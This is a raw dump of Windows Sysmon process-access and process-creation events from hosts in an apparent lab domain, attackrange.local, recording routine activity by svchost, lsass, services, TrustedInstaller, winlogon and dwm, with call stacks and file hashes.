12:24:43.140{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292175Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.140{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292174Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.140{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292173Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.140{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292172Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.140{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292171Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.140{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292170Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.140{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292169Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.140{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292168Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.140{BEA10069-D0C1-6086-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{BEA10069-028B-6088-0A2A-00000000BB01}3780C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000292167Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.140{BEA10069-D0C1-6086-0A00-00000000BB01}6246440C:\Windows\system32\services.exe{BEA10069-028B-6088-0A2A-00000000BB01}3780C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000292166Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.144{BEA10069-028B-6088-0A2A-00000000BB01}3780C:\Windows\servicing\TrustedInstaller.exe10.0.14393.3564 (rs1_release.200303-1942)Windows Modules InstallerMicrosoft® Windows® Operating SystemMicrosoft CorporationTrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=187076E4BC7B2F5FB7D54D1234B3CDEA,SHA256=7AE4CC64E2F0E5C58ABB6542233DA78B9AEAAD22C9D853AB96265EF3FBFEFABE,IMPHASH=648F735E453FC6802BFAECAC5ACA72A4{BEA10069-D0C1-6086-0A00-00000000BB01}624C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x8000000000000000292165Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.140{BEA10069-D0C1-6086-0B00-00000000BB01}640712C:\Windows\system32\lsass.exe{BEA10069-D0C1-6086-0A00-00000000BB01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292164Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.140{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D0C1-6086-0B00-00000000BB01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292163Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.140{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D0C1-6086-0B00-00000000BB01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292162Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.140{BEA10069-D0C1-6086-0B00-00000000BB01}640712C:\Windows\system32\lsass.exe{BEA10069-D0C1-6086-0A00-00000000BB01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292161Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.125{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D4AC-6086-4701-00000000BB01}3580C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292160Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.125{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D4AC-6086-4701-00000000BB01}3580C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292159Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.125{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D4AC-6086-4701-00000000BB01}3580C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292158Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.125{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D4AC-6086-4701-00000000BB01}3580C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292157Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.125{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440747Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.120{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440746Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.120{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440745Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.120{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440744Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.118{42DC5269-028A-6088-C228-00000000BA01}43046484C:\Windows\system32\csrss.exe{42DC5269-028B-6088-C528-00000000BA01}6920C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000440743Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.118{42DC5269-028A-6088-C328-00000000BA01}6272636C:\Windows\system32\winlogon.exe{42DC5269-028B-6088-C528-00000000BA01}6920C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\SYSTEM32\dwminit.dll+2d11|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000440742Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.118{42DC5269-028B-6088-C528-00000000BA01}6920C:\Windows\System32\dwm.exe10.0.14393.0 (rs1_release.160715-1616)Desktop Window ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationdwm.exe"dwm.exe"C:\Windows\system32\Window Manager\DWM-3{42DC5269-028B-6088-3D2F-750100000000}0x1752f3d3SystemMD5=C89F159A577F19F7F03C73C98D29D841,SHA256=B3E37997C1C62DD90D69EF83D6A6FC782BF9A5B8AD04A0D1528A8B7FA31AA408,IMPHASH=DDB7DE3741333EE031929A760FCD4542{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\System32\winlogon.exewinlogon.exe 10341000x8000000000000000440741Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 